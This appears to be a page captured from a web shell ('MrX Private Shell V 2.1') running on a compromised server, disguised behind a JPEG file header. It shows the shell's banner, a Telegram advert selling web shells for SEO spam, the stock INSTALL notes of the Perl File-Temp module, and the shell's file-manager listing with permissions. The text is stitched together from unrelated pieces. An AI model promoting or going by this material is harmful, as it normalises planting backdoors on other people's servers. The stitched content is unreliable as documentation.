����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
This is the Perl distribution File-Temp.
Installing File-Temp is straightforward.
## Installation with cpanm
If you have cpanm, you only need one line:
% cpanm File::Temp
If it does not have permission to install modules to the current perl, cpanm
will automatically set up and install to a local::lib in your home directory.
See the local::lib documentation (https://metacpan.org/pod/local::lib) for
details on enabling it in your environment.
## Installing with the CPAN shell
Alternatively, if your CPAN shell is set up, you should just be able to do:
% cpan File::Temp
## Manual installation
As a last resort, you can manually install it. If you have not already
downloaded the release tarball, you can find the download link on the module's
MetaCPAN page: https://metacpan.org/pod/File::Temp
Untar the tarball, install configure prerequisites (see below), then build it:
% perl Makefile.PL
% make && make test
Then install it:
% make install
On Windows platforms, you should use `dmake` or `nmake`, instead of `make`.
If your perl is system-managed, you can create a local::lib in your home
directory to install modules to. For details, see the local::lib documentation:
https://metacpan.org/pod/local::lib
The prerequisites of this distribution will also have to be installed manually. The
prerequisites are listed in one of the files: `MYMETA.yml` or `MYMETA.json` generated
by running the manual build process described above.
## Configure Prerequisites
This distribution requires other modules to be installed before this
distribution's installer can be run. They can be found under the
"configure_requires" key of META.yml or the
"{prereqs}{configure}{requires}" key of META.json.
## Other Prerequisites
This distribution may require additional modules to be installed after running
Makefile.PL.
Look for prerequisites in the following phases:
* to run make, PHASE = build
* to use the module code itself, PHASE = runtime
* to run tests, PHASE = test
They can all be found in the "PHASE_requires" key of MYMETA.yml or the
"{prereqs}{PHASE}{requires}" key of MYMETA.json.
## Documentation
File-Temp documentation is available as POD.
You can run `perldoc` from a shell to read the documentation:
% perldoc File::Temp
For more information on installing Perl modules via CPAN, please see:
https://www.cpan.org/modules/INSTALL.html
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| lib | Folder | 0775 |
|
|
| misc | Folder | 0775 |
|
|
| t | Folder | 0775 |
|
|
| xt | Folder | 0775 |
|
|
| CONTRIBUTING | File | 3.94 KB | 0644 |
|
| Changes | File | 14.13 KB | 0640 |
|
| INSTALL | File | 2.33 KB | 0644 |
|
| LICENSE | File | 19.36 KB | 0644 |
|
| MANIFEST | File | 650 B | 0644 |
|
| META.json | File | 45.59 KB | 0644 |
|
| META.yml | File | 26.72 KB | 0644 |
|
| MYMETA.json | File | 45.68 KB | 0644 |
|
| MYMETA.yml | File | 26.73 KB | 0644 |
|
| Makefile | File | 32.42 KB | 0644 |
|
| Makefile.PL | File | 2.11 KB | 0644 |
|
| README | File | 439 B | 0644 |
|
| cpanfile | File | 1.71 KB | 0644 |
|
| dist.ini | File | 1.93 KB | 0600 |
|
| pm_to_blib | File | 0 B | 0644 |
|